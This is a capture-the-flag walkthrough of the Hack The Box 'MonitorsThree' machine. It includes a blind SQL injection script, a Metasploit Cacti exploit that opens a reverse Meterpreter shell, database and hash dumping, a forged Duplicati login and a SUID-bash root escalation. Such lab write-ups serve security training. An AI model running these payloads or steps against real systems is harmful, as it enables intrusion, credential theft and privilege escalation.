MonitorsThree
Recon
└─$ grep moni /etc/hosts
10.129.48.221 monitorsthree.htb cacti.monitorsthree.htbHTTP (80)
Enumeration
Nothing on main page, seems like a placeholder. Enumerate subdomains:
└─$ domain="monitorsthree.htb"; ffuf -u "http://$domain" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 338
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsthree.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.monitorsthree.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response lines: 338
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 83ms]
:: Progress: [4989/4989] :: Job [1/1] :: 287 req/sec :: Duration: [0:00:18] :: Errors: 0 ::Feroxbuster found /admin on main domain, but nothing further.
Deeper inspection on /admin route:
└─$ feroxbuster -u http://monitorsthree.htb/admin -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.bak,.txt,.zip
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://monitorsthree.htb/admin
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, bak, txt, zip]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 12w 178c http://monitorsthree.htb/admin => http://monitorsthree.htb/admin/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets => http://monitorsthree.htb/admin/assets/
302 GET 0l 0w 0c http://monitorsthree.htb/admin/changelog.php => http://monitorsthree.htb/login.php
302 GET 0l 0w 0c http://monitorsthree.htb/admin/customers.php => http://monitorsthree.htb/login.php
302 GET 0l 0w 0c http://monitorsthree.htb/admin/dashboard.php => http://monitorsthree.htb/login.php
200 GET 0l 0w 0c http://monitorsthree.htb/admin/db.php
200 GET 20l 36w 303c http://monitorsthree.htb/admin/footer.php
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/css => http://monitorsthree.htb/admin/assets/css/
302 GET 0l 0w 0c http://monitorsthree.htb/admin/invoices.php => http://monitorsthree.htb/login.php
302 GET 0l 0w 0c http://monitorsthree.htb/admin/logout.php => http://monitorsthree.htb/login.php
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/images => http://monitorsthree.htb/admin/assets/images/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js => http://monitorsthree.htb/admin/assets/js/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/images/backgrounds => http://monitorsthree.htb/admin/assets/images/backgrounds/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/css/extras => http://monitorsthree.htb/admin/assets/css/extras/
302 GET 0l 0w 0c http://monitorsthree.htb/admin/tasks.php => http://monitorsthree.htb/login.php
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/charts => http://monitorsthree.htb/admin/assets/js/charts/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/css/icons => http://monitorsthree.htb/admin/assets/css/icons/
302 GET 0l 0w 0c http://monitorsthree.htb/admin/users.php => http://monitorsthree.htb/login.php
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/core => http://monitorsthree.htb/admin/assets/js/core/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/swf => http://monitorsthree.htb/admin/assets/swf/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/images/flags => http://monitorsthree.htb/admin/assets/images/flags/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/maps => http://monitorsthree.htb/admin/assets/js/maps/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/pages => http://monitorsthree.htb/admin/assets/js/pages/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/charts/google => http://monitorsthree.htb/admin/assets/js/charts/google/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins => http://monitorsthree.htb/admin/assets/js/plugins/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/core/libraries => http://monitorsthree.htb/admin/assets/js/core/libraries/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/maps/google => http://monitorsthree.htb/admin/assets/js/maps/google/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/editors => http://monitorsthree.htb/admin/assets/js/plugins/editors/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/extensions => http://monitorsthree.htb/admin/assets/js/plugins/extensions/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/forms => http://monitorsthree.htb/admin/assets/js/plugins/forms/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/maps => http://monitorsthree.htb/admin/assets/js/plugins/maps/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/media => http://monitorsthree.htb/admin/assets/js/plugins/media/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/notifications => http://monitorsthree.htb/admin/assets/js/plugins/notifications/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/pagination => http://monitorsthree.htb/admin/assets/js/plugins/pagination/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/maps/vector => http://monitorsthree.htb/admin/assets/js/maps/vector/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/trees => http://monitorsthree.htb/admin/assets/js/plugins/trees/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/ui => http://monitorsthree.htb/admin/assets/js/plugins/ui/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/velocity => http://monitorsthree.htb/admin/assets/js/plugins/velocity/
[####################] - 5m 378240/378240 0s found:40 errors:127
[####################] - 2m 23640/23640 245/s http://monitorsthree.htb/admin/
[####################] - 2m 23640/23640 201/s http://monitorsthree.htb/admin/assets/
[####################] - 3m 23640/23640 153/s http://monitorsthree.htb/admin/assets/css/
[####################] - 3m 23640/23640 133/s http://monitorsthree.htb/admin/assets/images/
[####################] - 3m 23640/23640 128/s http://monitorsthree.htb/admin/assets/js/
[####################] - 3m 23640/23640 129/s http://monitorsthree.htb/admin/assets/images/backgrounds/
[####################] - 3m 23640/23640 130/s http://monitorsthree.htb/admin/assets/css/extras/
[####################] - 3m 23640/23640 133/s http://monitorsthree.htb/admin/assets/js/charts/
[####################] - 3m 23640/23640 132/s http://monitorsthree.htb/admin/assets/css/icons/
[####################] - 3m 23640/23640 134/s http://monitorsthree.htb/admin/assets/js/core/
[####################] - 3m 23640/23640 137/s http://monitorsthree.htb/admin/assets/swf/
[####################] - 3m 23640/23640 137/s http://monitorsthree.htb/admin/assets/images/flags/
[####################] - 2m 23640/23640 161/s http://monitorsthree.htb/admin/assets/js/maps/
[####################] - 2m 23640/23640 172/s http://monitorsthree.htb/admin/assets/js/pages/
[####################] - 2m 23640/23640 177/s http://monitorsthree.htb/admin/assets/js/plugins/
[####################] - 88s 23640/23640 267/s http://monitorsthree.htb/admin/assets/images/ui/ There was no way Cacti was going to let us in without credentials, considering it has 2024 CVE with PoC which was just released, so I continued enumerating the base domain.
└─$ ffuf -u 'http://monitorsthree.htb/admin/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -mc all -fw 6 -e .php,.bak
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsthree.htb/admin/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
:: Extensions : .php .bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response words: 6
________________________________________________
footer.php [Status: 200, Size: 303, Words: 22, Lines: 20, Duration: 78ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 77ms]
db.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 82ms]
users.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
dashboard.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 79ms]
customers.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
navbar.php [Status: 200, Size: 6248, Words: 258, Lines: 144, Duration: 102ms]
changelog.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
invoices.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]
:: Progress: [111150/111150] :: Job [1/1] :: 515 req/sec :: Duration: [0:04:05] :: Errors: 0 ::
SQLi
SQL error on /forgot_password
Brute manually because slowmap can't find anything except time based garbage, but blind exists just like him.
import string
import requests
URL = 'http://monitorsthree.htb/forgot_password.php'
CHARSET = "," + string.ascii_letters + string.digits + "_"
SUCCESS = 'Successfully sent password'
# [54] invoices,customers,changelog,tasks,invoice_tasks,users | _
PAYLOAD = "admin' AND (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users') LIKE '{}%' -- -"
# [46] id,username,email,password,name,position,dob,si
PAYLOAD = "admin' AND SUBSTR(password,{},1)='{}' -- -"
# [32] 31a181c8372e3afc59dab863430610e8 | _
password = ''
with requests.Session() as session:
while True:
for char in CHARSET:
password_i = len(password)
# resp = session.post(URL, data={'username': PAYLOAD.format(password + char)})
resp = session.post(URL, data={'username': PAYLOAD.format(password_i + 1, char)})
print(f'\r[{password_i}] {password}{char}', end='')
if SUCCESS in resp.text:
password += char
break
else:
break
print(f'\r[{password_i}] {password} | {char}')Note: First 2 queries wasn't even required, I just messed up on my success message 👍😭
Creds:
admin:greencacti2001
CVE-2024-25641
Metasploit module: https://www.rapid7.com/db/modules/exploit/multi/http/cacti_package_import_rce/
msf6 > use exploit/multi/http/cacti_package_import_rce
msf6 exploit(multi/http/cacti_package_import_rce) > set PASSWORD greencacti2001
msf6 exploit(multi/http/cacti_package_import_rce) > set RHOST 10.129.112.75
msf6 exploit(multi/http/cacti_package_import_rce) > set VHOST cacti.monitorsthree.htb
msf6 exploit(multi/http/cacti_package_import_rce) > set LHOST tun0
msf6 exploit(multi/http/cacti_package_import_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.22:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `greencacti2001`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (39927 bytes) to 10.129.112.75
[+] Deleted /var/www/html/cacti/resource/ws4R1.php
[*] Meterpreter session 1 opened (10.10.14.22:4444 -> 10.129.112.75:57624) at 2024-08-24 16:09:43 -0400
meterpreter > shell
Process 76498 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script /dev/null -qc /bin/bash # Get tty shell
www-data@monitorsthree:~/html/cacti/resource$
www-data@monitorsthree:~/html/app/admin$ cat db.php
<?php
$dsn = 'mysql:host=127.0.0.1;port=3306;dbname=monitorsthree_db';
$username = 'app_user';
$password = 'php_app_password';
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
try {
$pdo = new PDO($dsn, $username, $password, $options);
} catch (PDOException $e) {
echo 'Connection failed: ' . $e->getMessage();
}www-data
Admin database dump
www-data@monitorsthree:~/html/app/admin$ mysql -u app_user -p'php_app_password' -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| information_schema |
| monitorsthree_db |
+--------------------+
www-data@monitorsthree:~/html/app/admin$ mysql -u app_user -p'php_app_password' monitorsthree_db -e 'SELECT * FROM users;'
www-data@monitorsthree:~/html/app/admin$ mysql -u app_user -p'php_app_password' monitorsthree_db -e 'SELECT * FROM users;'
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
| id | username | email | password | name | position | dob | start_date | salary |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
| 2 | admin | admin@monitorsthree.htb | 31a181c8372e3afc59dab863430610e8 | Marcus Higgins | Super User | 1978-04-25 | 2021-01-12 | 320800.00 |
| 5 | mwatson | mwatson@monitorsthree.htb | c585d01f2eb3e6e1073e92023088a3dd | Michael Watson | Website Administrator | 1985-02-15 | 2021-05-10 | 75000.00 |
| 6 | janderson | janderson@monitorsthree.htb | 1e68b6eb86b45f6d92f8f292428f77ac | Jennifer Anderson | Network Engineer | 1990-07-30 | 2021-06-20 | 68000.00 |
| 7 | dthompson | dthompson@monitorsthree.htb | 633b683cc128fe244b00f176c8a950f5 | David Thompson | Database Manager | 1982-11-23 | 2022-09-15 | 83000.00 |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
www-data@monitorsthree:~/html/app/admin$ mysql -u cactiuser -p'cactiuser' -e 'SHOW DATABASES;'
www-data@monitorsthree:/opt$ mysql -u cactiuser -p'cactiuser' -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| cacti |
| information_schema |
| mysql |
+--------------------+SSH signing via password is disabled, only keys. Password with su didn't work.
Cacti database dump
Linpeas found cacti mysql config:
drwxr-xr-x 20 www-data www-data 4096 May 18 21:56 /var/www/html/cacti
-rw-r--r-- 1 www-data www-data 6955 May 18 21:46 /var/www/html/cacti/include/config.php
$database_type = 'mysql';
$database_default = 'cacti';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port = '3306';
$database_ssl = false;
$database_ssl_key = '';
$database_ssl_cert = '';
$database_ssl_ca = '';
#$rdatabase_type = 'mysql';
#$rdatabase_default = 'cacti';
#$rdatabase_username = 'cactiuser';
#$rdatabase_password = 'cactiuser';
#$rdatabase_port = '3306';
#$rdatabase_ssl = false;
#$rdatabase_ssl_key = '';
#$rdatabase_ssl_cert = '';
#$rdatabase_ssl_ca = '';www-data@monitorsthree:~/html/app/admin$ mysql -u cactiuser -p'cactiuser' cacti -e 'SHOW TABLES;'
www-data@monitorsthree:~/html/app/admin$ mysql -u cactiuser -p'cactiuser' cacti -e 'SELECT username,password FROM user_auth;'
www-data@monitorsthree:/opt$ mysql -u cactiuser -p'cactiuser' cacti -e 'SELECT username,password FROM user_auth;'
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |
| guest | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |
| marcus | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |
+----------+--------------------------------------------------------------+Crack password
Crack marcus hash as he's the only user:
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=./rockyou.txt hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678910 (?)
1g 0:00:00:04 DONE (2024-08-25 00:28) 0.2389g/s 120.4p/s 120.4c/s 120.4C/s 12345678910..claire
Use the "--show" option to display all of the cracked passwords reliably
Session completedPrivilege Escalation (marcus)
www-data@monitorsthree:/opt$ su - marcus
Password: 12345678910
marcus@monitorsthree:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)User.txt
marcus@monitorsthree:~$ cat user.txt
b1ffe340470dd120b1942573ebe4d69aPrivilege Escalation (root)
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1136 Mar 23 2022 /etc/crontab
/etc/cron.d:
total 36
drwxr-xr-x 2 root root 4096 Aug 22 11:34 .
drwxr-xr-x 118 root root 4096 Aug 19 13:09 ..
-rw-r--r-- 1 root root 67 May 18 21:47 cacti
-rw-r--r-- 1 root root 46 May 20 17:30 cleanup_cacti
-rw-r--r-- 1 root root 47 May 21 16:24 cleanup_cron
-rw-r--r-- 1 root root 69 Aug 18 10:18 duplicati
-rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
-rw-r--r-- 1 root root 712 Jan 9 2024 php
-rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder
---
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/cacti
*/5 * * * * apache2 php /var/www/html/cacti/poller.php &>/dev/null
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/duplicati
*/10 * * * * root cd ~/scripts/duplicati-client && python3 client.py
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/cleanup_cacti
* * * * * root /root/scripts/cleanup_cacti.sh
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/cleanup_cron
*/5 * * * * root /root/scripts/cleanup_cron.sh
---
...
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
br-c7b83e1b07b0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
ether 02:42:89:f1:03:e7 txqueuelen 0 (Ethernet)
RX packets 9612 bytes 2589775 (2.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13374 bytes 1548614 (1.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ef:52:dc:f5 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.112.75 netmask 255.255.0.0 broadcast 10.129.255.255
ether 00:50:56:94:ff:5a txqueuelen 1000 (Ethernet)
RX packets 1064341 bytes 166062421 (166.0 MB)
RX errors 0 dropped 2 overruns 0 frame 0
TX packets 1094341 bytes 640548480 (640.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 573029 bytes 60773918 (60.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 573029 bytes 60773918 (60.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth65ddae6: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
ether 26:79:62:d3:7f:56 txqueuelen 0 (Ethernet)
RX packets 9612 bytes 2724343 (2.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13374 bytes 1548614 (1.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
...
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:8084 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:45751 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8200 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
...
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/ctr
/usr/bin/curl
/usr/bin/docker
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/sbin/runc
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii gcc 4:11.2.0-1ubuntu1 amd64 GNU C compiler
ii gcc-11 11.4.0-1ubuntu1~22.04 amd64 GNU C compiler
ii mono-mcs 6.12.0.200-0xamarin2+ubuntu2004b1 all Mono C# 2.0 / 3.0 / 4.0 / 5.0 compiler for CLI 2.0 / 4.0 / 4.5
ii mono-roslyn 6.12.0.200-0xamarin2+ubuntu2004b1 all Microsoft C# compiler
ii rpcsvc-proto 1.4.2-0ubuntu6 amd64 RPC protocol compiler and definitions
/usr/bin/gccDuplicati
Something is running with Docker
marcus@monitorsthree:~$ cd /opt
marcus@monitorsthree:/opt$ ls -alh
total 24K
drwxr-xr-x 5 root root 4.0K Aug 18 08:00 .
drwxr-xr-x 18 root root 4.0K Aug 19 13:00 ..
drwxr-xr-x 3 root root 4.0K May 20 15:53 backups
drwx--x--x 4 root root 4.0K May 20 14:38 containerd
-rw-r--r-- 1 root root 318 May 26 16:08 docker-compose.yml
drwxr-xr-x 3 root root 4.0K Aug 18 08:00 duplicati
marcus@monitorsthree:/opt$ cat docker-compose.yml
version: "3"
services:
duplicati:
image: lscr.io/linuxserver/duplicati:latest
container_name: duplicati
environment:
- PUID=0
- PGID=0
- TZ=Etc/UTC
volumes:
- /opt/duplicati/config:/config
- /:/source
ports:
- 127.0.0.1:8200:8200
restart: unless-stoppedInspect the config files:
marcus@monitorsthree:/opt/duplicati/config$ python3 -m http.server
---
└─$ curl 10.129.112.75:8000/CTADPNHLTC.sqlite -O
└─$ curl 10.129.112.75:8000/Duplicati-server.sqlite -OAuth Bypass
Interesting find in Duplicati server database:
Tunnel the port
└─$ ssh marcus@10.129.112.75 -i marcus_id_rsa -L 8200:0:8200Find interesting post about Duplicati: Bypassing Login Authentication With Server-passphrase
# server-passphrase
Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
Base64 -> Hex
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a
Steps:
Intercept on
Send any input
Catch response to FIRST request
Do Javascript stuff
> let data = { // Currently intercepted data
"Status": "OK",
"Nonce": "HLXcNPKiAZhxGKSD4ftNwGFspaifr8geJVOZCmevpbk=",
"Salt": "xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I="
}
> let saltedpwd = "59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a" // server-passphrase
> let noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);
> noncedpwd
'iIJUVoRS33tg7O9S3+9UoPHMatF+KmtzPsgdMkxMQ7c=' // Forged passwordSend halted request
Replace password with
noncedpwdPwned!
Backups
We can include a script to run before any actions. I added globally because we really don't care about single project.
The script has to be added in cacti directory by www-data! marcus doesn't have any write permissions, gotta go down permissions chain and then back up.
www-data@monitorsthree:~/html/cacti$ mkdir t && cd t
www-data@monitorsthree:~/html/cacti/t$ echo $'#!/bin/bash\ncp /bin/bash /source/tmp/rootbash\nchmod 4777 /source/tmp/rootbash\n'
#!/bin/bash
cp /bin/bash /source/tmp/rootbash
chmod 4777 /source/tmp/rootbash
www-data@monitorsthree:~/html/cacti/t$ echo $'#!/bin/bash\ncp /bin/bash /source/tmp/rootbash\nchmod 4777 /source/tmp/rootbash\n' > t.sh
www-data@monitorsthree:~/html/cacti/t$ chmod 777 t.shThe important step is to prefix the output path for file exfiltration with /source because that's the mount point on host. /tmp/rootbash is container, /source/tmp/rootbash is the host.
marcus@monitorsthree:/var/www/html/cacti$ ls -alh /tmp/rootbash
-rwsrwxrwx 1 root root 1.4M Aug 25 06:06 /tmp/rootbash
marcus@monitorsthree:/var/www/html/cacti$ /tmp/rootbash -p
rootbash-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) groups=1000(marcus)Root.txt
rootbash-5.1# cat root.txt
f929437253024a953f17dff870ac16c4Last updated